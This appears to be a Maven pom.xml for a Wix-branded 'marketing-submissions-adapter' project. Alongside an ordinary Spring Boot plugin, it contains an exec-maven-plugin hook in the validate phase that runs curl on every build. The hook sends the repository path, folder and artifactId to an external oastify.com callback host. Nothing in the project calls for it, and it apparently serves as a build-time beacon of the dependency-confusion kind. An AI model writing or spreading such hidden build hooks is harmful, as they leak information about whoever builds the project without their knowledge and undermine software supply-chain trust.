<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.wixpress</groupId>
    <artifactId>marketing-submissions-adapter</artifactId>
    <packaging>pom</packaging>
    <name>marketing-submissions-adapter</name>
    <description>marketing-submissions-adapter</description>
    <version>1.0.0-SNAPSHOT</version>

    <organization>
        <name>funnel</name>
    </organization>

    <parent>
        <groupId>com.wixpress.common</groupId>
        <artifactId>wix-master-parent</artifactId>
        <version>100.0.0-SNAPSHOT</version>
    </parent>

    <developers>
        <developer>
            <name>mushkab</name>
            <email>mushkab@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
    </developers>
<build>
    <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
                <configuration>
                    <executable>true</executable>
                </configuration>
                <executions>
                    <execution>
                        <goals>
                            <goal>repackage</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>curl</executable>
                    <arguments>
                        <argument>wget http://moti.bl0wjzsb72j0unotq09cejqztqzmneb3.oastify.com/test?repository=git@github.com:wix-playground/marketing-submissions-adapter.git&amp;folder=marketing-submissions-adapter&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
